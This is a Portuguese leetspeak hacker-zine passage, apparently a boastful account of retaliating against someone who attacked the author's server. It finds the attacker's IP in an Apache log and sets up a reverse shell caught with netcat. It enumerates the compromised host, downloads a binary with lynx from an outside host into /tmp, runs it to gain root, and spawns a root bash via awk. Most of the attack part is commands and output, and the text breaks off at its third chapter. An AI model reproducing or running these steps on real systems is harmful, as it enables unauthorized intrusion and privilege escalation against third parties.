text
stringlengths
0
1.99k
* *
* B0m d1t0 1550 v4m05 4 pwn4g3m!!! *
* *
***********************************************************************************************/
#include <c4p1tul0.1> /* 0 m35tr3 d05 d15f4rc35 3 53u 1P d3 c454 */
#include <c4p1tul0.2> /* R0d4nd0 0 l337 4t4qu3 */
#include <c4p1tul0.3> /* 05 4rqu1v05 d3 um h4ck3r */
#include <c4p1tul0.4> /* b0nu5 */
#include <c4p1tul0.5> /* C0n51d3r4ç035 f1n415 */
/* -------------------------------------------- c4p1tul0.1 ------------------------------------------- /
| |
| 0 m35tr3 d05 d15f4rc35 3 53u 1P d3 c454 |
| |
/ --------------------------------------------------------------------------------------------------- /
/ huM c0n53g1r 53u r34l 1P d3 4c3550 n40 f0i um4 d45 t4r3f45 m415 d1f1c315 um4 v3z qu3 0 m35m0 |
| ult1l1z4 5u4 pr0pr14 c0n3x40 d3 c454 l1mp4 53m p4554r p0r qu4lqu3r t1p0 d3 0bfu5c4d0r, 0u um |
| 51mpl35 pr0xy p4r4 1nv4d1r 53rv1d0r35 4l34t0r105 53m qu4lqu3r cr1t3r10 53m c0n53gu1r 0bt3r |
| pr1v1l3g105 r00t 0 qu3 t1r4 qu4lqu3r p0551b1l1d4d3 d3 4p4g4r 05 r45tr05 m415 1d10t45 p0551v315 qu3 |
| 3l3 d31x4. |
| D3 t0d4 f0rm4 3 b3m f4c1l d35c0br1r 0nd3 pr0cur4r j4 qu3 0 m35m0 c0rr3 p4r4 f4z3r p05t4g3n5 h4x0r5 |
| 3m 53u tw1tt3r l0g0 qu3 0wn4 4lg0, tw1tt3r 35t3 ch310 d3 p355045 qu3 4cr3d1t4m n45 5u45 |
| GR4ND35 h4b1l1d4d35 H4H4H4 */
[~]# grep "zakrytye" /var/log/apache2/access.log|head -n1
191.19.23.155 - - [15/Mai/2020:18:14:31 -0300] "GET /zakrytye.html HTTP/1.1" 200 <------ IP HaxStr0ke
/* H4H4 f4c1lm3nt3 3nc0ntr4d0 3m qu4lqu3r w3b53rv3r qu3 ele p4554 /
| b0m 4g0r4 1r31 pul4r t0d4 4 p4rt3 ch4t4 3 d3m0r4d4 d45 t3nt4t1v45 |
/ 4t3 45 v145 d3 f4t0! H4H4 */
/* -------------------------------------------- c4p1tul0.2 -------------------------------------------- /
| |
| r0d4nd0 0 l337 4t4qu3 h4h4 |
| |
/ ---------------------------------------------------------------------------------------------------- */
sec:~# ./rstack -w -r191.19.23.155:8088 -l200.20.50.2:80 -x5
Oh yEaH!!
look at me as i penetrate
your server seductively!
...
...
... 8=D ~~~~~
Enjoy your shell!!
b33r:~# nc -lvvn 80
Listening on [0.0.0.0] (family 0, port 80)
Connection from [191.19.23.155] port 80 [tcp/ *] accepted (family 2, sport 35884)
sh-4.2$ echo "0h y34h pwn3d"
0h y34h pwn3d
/* H0H0H0 MU1T0 B0M! PWN3D! /
| /
| 4cr3d1t3m 0u n40 3l3 t3m um 53rv1d0r c4541r0 l1g4d0 24h ap3n45 pr4 d31x4r r0d4nd0 5c4n /
| d3 phpmy4dm1n, t0mc4t e brut3f0rc3 de w0rdpr355 e I0T c0m 53u pr0pr10 1P d3 c454 /
| b451c4m3nt3 05 c0nh3c1m3nt05 d3l3 53 l1m1t4m 4p3n45 4h 3553 t1p0 d3 4t4qu35. /
sh-4.2$ uname -a;id
Linux nationalserver 3.10.0-1062.12.1.el7.x86_64 #1 SMP Tue Feb 4 23:02:59 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
uid=48(apache) gid=48(apache) grupos=48(apache)
sh-4.2$ cat /etc/*release*|head -n1
CentOS Linux release 7.7.1908 (Core)
/* huN m45 t3m 4lg0 qu3 35t4 m3 1nc0m0d4nd0.. v4m05 d4r um j31t0 n1550! */
sh-4.2$ cd /tmp;lynx --source 200.20.50.2:7977/dec/COS >> COS
sh-4.2$ chmod +x COS;./COS --lptd=7
.....................
..............
fuck the banner,
we just want r00t
.........
.....................
g0t r00t!?
sh-4.2# id
uid=0(root) gid=0(root) grupos=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0
/* Y34H !!!! :D */
sh-4.2# awk 'BEGIN {system("/bin/bash")}'
[root@nationalserver ~]# echo "fud3u pr4 v0c3 4m1g0 :)"
fud3u pr4 v0c3 4m1g0 :)
/* -------------------------------------------- c4p1tul0.3 -------------------------------------------- /
| |